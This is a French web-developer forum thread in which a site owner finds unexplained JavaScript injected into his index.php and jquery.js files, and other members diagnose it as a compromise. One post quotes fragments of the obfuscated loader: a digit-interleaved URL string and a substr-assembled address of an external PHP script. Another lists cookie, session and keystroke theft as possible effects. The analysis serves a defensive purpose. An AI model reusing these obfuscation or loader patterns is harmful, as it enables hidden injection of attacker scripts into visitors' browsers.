|
Publicité | ||||||||||||||||||||||
|
|
#1 | ||
|
Invité de passage
![]() Inscription : décembre 2009 Messages : 17 ![]() |
salut
voici le code que j'ai trouvé dans plusieurs fichier(en particulier les index.php) je ne sais pas d'ou sort ce code !! je me suis fait hacker ? Si oui a quoi sert ce code ? J'ai plusieurs sites et ils ont tous ce code !!!c'est quoi ce truk de fou ! encore plus étrange ce code se trouve même dans jquery.js Code :
Dernière modification par chrisdayton ; 11/03/2010 à 23h28. |
||
|
|
00
|
|
|
#2 |
![]() ![]() Développeur Web Php Mysql Html Javascript CSS Apache - Intégrateur - Analyste Programmeur Inscription : mars 2002 Messages : 29 075 ![]() |
ça sent en effet pars très bon ...
Je viens à peine de survoler le code et je vois : et plus bas donc en gros ça fait : ce qui lance une fonction au démarrage de page ...
__________________
Ma page Developpez Président du CCMPTP (Comité Contre le Mot "Problème" dans les Titres de Posts) Deux règles du succès: 1) Ne communiquez jamais à quelqu'un tout votre savoir... Votre post est résolu ? Alors n'oubliez pas le Tag ![]() ![]() réalisations :www.planet-languages.com|www.saftair.com| www.ouestisol.fr | www.sebemex.fr | www.extramiante.fr | www.sistac-alizay.fr | www.acoustishop.fr | www.litt.fr | www.ouestventil.fr |
|
|
00
|
|
|
#3 | ||
![]() ![]() Inscription : janvier 2007 Messages : 9 037 ![]() |
Bonjour,
+1 : ça pue !Et y ajoute des éléments Code :
Ça te donnera peut être une piste pour une parade ... A+ |
||
|
|
00
|
|
|
#4 | ||
![]() ![]() Développeur Web Php Mysql Html Javascript CSS Apache - Intégrateur - Analyste Programmeur Inscription : mars 2002 Messages : 29 075 ![]() |
Code :
var m=u('h8t9t9p8:9/8/9y8e9s9k9y8-8c8o8m8.8y9n8e8t9.8c8o8m9.9k9e9y8r9u9n8-8c9n8.9p9r9o8p9l9u9s9l9a9b8.9r8u9:9',"89"); Citation:
Code :
varx=String("/beuSF".substr(0,3)+"ZbMsttMbZ".substr(3,3)+"ubeA6E8".substr(0,3)+"cli"+"6SPps.".substr(3)+"ECvcomvCE".substr(3,3)+"W8P/beP8W".substr(3,3)+"stt"+"s2mtube".substr(4)+"tJWcli".substr(3)+"ps."+"comjsP".substr(0,3)+"SaF/spSFa".substr(3,3)+"eedYg8F".substr(0,3)+"tes"+"wz5t.n".substr(3)+"et/"+"goovubk".substr(0,3)+"gleVij".substr(0,3)+"9A0E.co90EA".substr(4,3)+"8ZKsm/k".substr(4)+"aixpRV".substr(0,3)+"gvXin.".substr(3)+"comQ8p".substr(0,3)+"9BxD.ph".substr(4)+"qdAp".substr(3)); Citation:
__________________
Ma page Developpez Président du CCMPTP (Comité Contre le Mot "Problème" dans les Titres de Posts) Deux règles du succès: 1) Ne communiquez jamais à quelqu'un tout votre savoir... Votre post est résolu ? Alors n'oubliez pas le Tag ![]() ![]() réalisations :www.planet-languages.com|www.saftair.com| www.ouestisol.fr | www.sebemex.fr | www.extramiante.fr | www.sistac-alizay.fr | www.acoustishop.fr | www.litt.fr | www.ouestventil.fr |
||
|
|
00
|
|
|
#5 | |
![]() ![]() Développeur Web Php Mysql Html Javascript CSS Apache - Intégrateur - Analyste Programmeur Inscription : mars 2002 Messages : 29 075 ![]() |
Bon alors une fois le code dépouillé de beaucoup de code qui ne sert a rien
ce script insère une balise script sur la page qui pointe vers un fichier php externe dont la source est : ![]() ![]() Attention !!! ![]() ![]() ![]() JE NE SAIS PAS CE QUE FAIT CETTE PAGE ET DECONSEILLE FORTEMENT D'ALLER VOIR SI VOUS LE FAITES, FAITES LE A VOS RISQUES ET PERILS, JE DEGAGE TOUTE RESPONSABILITE SUR TOUTE UTILISATION QUE VOUS POURREZ FAIRE DE CE LIEN ET LES CONSEQUENCES QUE CELA POURRAIT AVOIR ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Citation:
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() En conclusion je dirais oui tu as été hacké ... efface ces fichiers au plus tot ...
__________________
Ma page Developpez Président du CCMPTP (Comité Contre le Mot "Problème" dans les Titres de Posts) Deux règles du succès: 1) Ne communiquez jamais à quelqu'un tout votre savoir... Votre post est résolu ? Alors n'oubliez pas le Tag ![]() ![]() réalisations :www.planet-languages.com|www.saftair.com| www.ouestisol.fr | www.sebemex.fr | www.extramiante.fr | www.sistac-alizay.fr | www.acoustishop.fr | www.litt.fr | www.ouestventil.fr |
|
|
|
00
|
|
|
#6 |
|
Invité de passage
![]() Inscription : décembre 2009 Messages : 17 ![]() |
c'est mon ordi qui a était hack ? pourtant spybot, Ad-Aware, antivir, on rien détecter
au pire qu'est ce qu'un script comme ça peut faire ? |
|
|
00
|
|
|
#7 | |
![]() ![]() Développeur Web Php Mysql Html Javascript CSS Apache - Intégrateur - Analyste Programmeur Inscription : mars 2002 Messages : 29 075 ![]() |
Citation:
il est ou ce codes ....??? ce code n'est actif que dans une page web.
__________________
Ma page Developpez Président du CCMPTP (Comité Contre le Mot "Problème" dans les Titres de Posts) Deux règles du succès: 1) Ne communiquez jamais à quelqu'un tout votre savoir... Votre post est résolu ? Alors n'oubliez pas le Tag ![]() ![]() réalisations :www.planet-languages.com|www.saftair.com| www.ouestisol.fr | www.sebemex.fr | www.extramiante.fr | www.sistac-alizay.fr | www.acoustishop.fr | www.litt.fr | www.ouestventil.fr |
|
|
|
00
|
|
|
#8 |
![]() ![]() Inscription : janvier 2007 Messages : 9 037 ![]() |
Oui, c'est plutôt ton serveur (qui est peut être ton ordi, mais peut être pas).
Ça a dû plutôt se passer côté PHP ... Et là, pas sûr qu'AntiVir ou autre y puisse grand chose ... A+ |
|
|
00
|
|
|
#9 |
|
Invité de passage
![]() Inscription : décembre 2009 Messages : 17 ![]() |
nan c'est chez plusieurs hébergeurs diffèrent ovh 1and1 ....
Ont a du avoir accès a mes codes ftp je pense que c'est a cause de fitzila . vous savez ce que ce genre de code fait ? |
|
|
00
|
|
|
#10 |
![]() ![]() Inscription : janvier 2007 Messages : 9 037 ![]() |
|
|
|
00
|
|
|
#11 |
![]() ![]() Développeur Web Php Mysql Html Javascript CSS Apache - Intégrateur - Analyste Programmeur Inscription : mars 2002 Messages : 29 075 ![]() |
pas forcément filezilla.
si tes pages sont en php et que passes des variables get ou post qui ne sont pas filtrée ...
__________________
Ma page Developpez Président du CCMPTP (Comité Contre le Mot "Problème" dans les Titres de Posts) Deux règles du succès: 1) Ne communiquez jamais à quelqu'un tout votre savoir... Votre post est résolu ? Alors n'oubliez pas le Tag ![]() ![]() réalisations :www.planet-languages.com|www.saftair.com| www.ouestisol.fr | www.sebemex.fr | www.extramiante.fr | www.sistac-alizay.fr | www.acoustishop.fr | www.litt.fr | www.ouestventil.fr |
|
|
00
|
|
|
#12 |
|
Invité de passage
![]() Inscription : décembre 2009 Messages : 17 ![]() |
oui j'ai déja lu les articles sur la securité en php sur developpez , mais je pense pas que ce soit a cause des méthode get ou post car
1)j'ai un site ou il n'y a aucun formulaire et pourtant il a bien ce code 2)seul les sites qui étaient dans connexion rapide dans fitzila ce sont fait attaquer mais j'aimerai juste savoir si vous avez une idée de ce qu'un script comme ca peut faire ? |
|
|
00
|
|
|
#13 |
![]() ![]() Développeur Web Php Mysql Html Javascript CSS Apache - Intégrateur - Analyste Programmeur Inscription : mars 2002 Messages : 29 075 ![]() |
récupérer toutes les informations sniffables ...
récupérer les cookies ... récupérer les sessions ... récupérer toutes les frappes au clavier ... voir plus avec une image contenant un applet... Bref un tas de choses
__________________
Ma page Developpez Président du CCMPTP (Comité Contre le Mot "Problème" dans les Titres de Posts) Deux règles du succès: 1) Ne communiquez jamais à quelqu'un tout votre savoir... Votre post est résolu ? Alors n'oubliez pas le Tag ![]() ![]() réalisations :www.planet-languages.com|www.saftair.com| www.ouestisol.fr | www.sebemex.fr | www.extramiante.fr | www.sistac-alizay.fr | www.acoustishop.fr | www.litt.fr | www.ouestventil.fr |
|
|
00
|
Copyright © 2000-2012 - www.developpez.com